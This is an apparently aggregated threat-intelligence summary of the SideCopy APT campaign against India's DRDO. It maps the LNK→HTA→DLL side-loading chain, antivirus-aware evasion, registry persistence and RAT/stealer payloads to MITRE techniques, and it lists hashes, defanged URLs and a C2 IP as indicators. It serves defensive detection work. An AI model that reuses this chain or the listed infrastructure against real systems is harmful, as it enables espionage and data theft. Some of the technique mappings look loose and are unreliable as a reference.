Threat Research

Cyble – Notorious SideCopy APT Group Sets Sights On India’s DRDO

Securonix

SideCopy APT, a Pakistan-based actor active since 2019, targets South Asia with a multi-stage infection chain that leverages LNK and HTA loaders to deploy DLLs and final payloads. The campaign against India’s DRDO demonstrates DLL side-loading, anti-virus evasion, and a remote-control/information-stealing payload stage. #SideCopy #DRDO #SideWinder #TransparentTribe #APT36 #PantomimeHTA #PreBotHta #DUser.dll #cridviz.exe #AuToStealer

Keypoints

  • SideCopy APT is a South Asian-focused actor (Pakistan-based) active since 2019, linked to groups with similarities to SideWinder and Transparent Tribe.
  • The campaign highlighted targets the Indian government entity DRDO, signaling interest in defense-related victims.
  • Infection starts with a spam email that delivers a ZIP containing an LNK file; users run the LNK to begin the chain.
  • The chain uses mshta.exe to fetch remote content, redirecting to a URL hosting an HTA file (pantomime.hta) that decodes and drops a PPT payload.
  • DLL side-loading is used: credwiz.exe is copied/masqueraded and a malicious DUser.dll is loaded via a loader sequence, with various paths chosen to evade detection.
  • The final payload includes an Action RAT and AuTo Stealer for data collection, C2 communications, and potential information exfiltration.
  • Persistence is achieved by dropping a batch file (test.bat) to create a startup entry for cridviz.exe, ensuring re-launch on boot.

MITRE Techniques

  • [T1566] Spearphishing Attachment – The initial infection starts with a spam email containing the link to the malicious file hosted on the compromised website. “The initial infection starts with the user extracting a zip file and then running the .lnk file on their machine.”
  • [T1204] User Execution – The user executes the LNK file as part of opening the ZIP payload chain. “The initial infection starts with the user extracting a zip file and then running the .lnk file on their machine.”
  • [T1047] Windows Management Instrumentation – The loader uses a WMI query to gather antivirus details. “The loader uses a WMI query, specifically ‘Select * From AntiVirus,’ to gather the names of installed antivirus products.”
  • [T1170] Mshta – The chain triggers mshta.exe to connect to a remote URL. “Once the .lnk file is executed, it triggers a command that launches “mshta.exe” to connect to a specific URL.”
  • [T1129] Shared Modules – The HTA-based stage loads code and payloads into memory via dynamic invocation. “the hta file decodes and decompresses the PPT file encoded in Base64 format. Consequently, it saves the decompressed Microsoft PowerPoint file in the “%temp%” folder… and launches it.”
  • [T1036] Masquerading – The loader drops files under various names/directories based on installed antivirus, to evade defense Evasion. “The loader utilizes various directories to drop the files ‘credwiz.exe’ and ‘DUser.dll’ using different names based on the type of AntiVirus software installed.”
  • [T1547] Registry Run Keys / Startup Folder – Persistence via startup entries for cridviz.exe. “This loader DLL file also drops a batch file named ‘test.bat’ in the %temp% directory, which creates an auto startup entry for the ‘cridviz.exe’ file using the ‘reg.exe’ utility.”
  • [T1016] System Network Configuration – Discovery via WMI/antivirus enumeration. “The loader uses a WMI query, specifically ‘Select * From AntiVirus,’ to gather the names of installed antivirus products.”
  • [T1071] Application Layer Protocol – C2 over HTTP. “The RAT transmits data to the Command-and-Control(C&C) server via HTTP request.”
  • [T1105] Ingress Tool Transfer – The chain downloads and executes HTA/loader content from remote URLs. “the hta file is downloaded and executed in the path mentioned below” and the C2 URL references are shown.

Indicators of Compromise

  • [File Hash] DRDO-K4-Missile-Clean-room.zip – 0725318b4f5c312eeaf5ec9795a7e919, 9902348fc5dffe10a94a3f4be219dc42330ed480, 9aed0c5a047959ef38ec0555ccb647688c67557a6f8f60f691ab0ec096833cce
  • [File Hash] DRDO – K4 Missile Clean room.pptx.lnk – ab11b91f97d7672da1c5b42c9ecc6d2e, feeadc91373732d65883c8351a6454a77a063ff5, a2e55cbd385971904abf619404be7ee8078ce9e3e46226d4d86d96ff31f6bb9a
  • [File Hash] pantomime.hta (Stage 1) – cbaa7fc86e4f1a30a155f60323fdb72a, d7dcea1c35475caa85e9298e44b63d3ce43fb2f0, e88835e21c431d00a9b465d2e8bed746b6369892e33be10bc7ebbda6e8185819
  • [File Hash] jquery.hta (Stage 2) – 036da574b5967c71951f4e14d000398c, e612dbb34e01b41e46359019db9340e17e0390b8, 85faf414ed0ba9c58b9e7d4dc7388ba5597598c93b701d367d8382717fb485ec
  • [File Hash] DUser.dll (Action RAT) – 2e19b7a2bbdc8082024d259e27e86911, 3c4c8cbab1983c775e6a76166f7b3c84dde8c8c5, 865e041b41b9c370a4eed91a9a407bd44a94e16e236e07be05e87de319a4486c
  • [URL] Malicious ZIP file download link – hxxps://www.cornerstonebeverly.org/js/files/DRDO-K4-Missile-Clean-room.zip
  • [URL] Target command URL – hxxps://www.cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso
  • [URL] pantomime.hta URL – hxxps://www.cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta
  • [IP] C2 Server – 144.91.72.17:8080

Read more: https://blog.cyble.com/2023/03/21/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint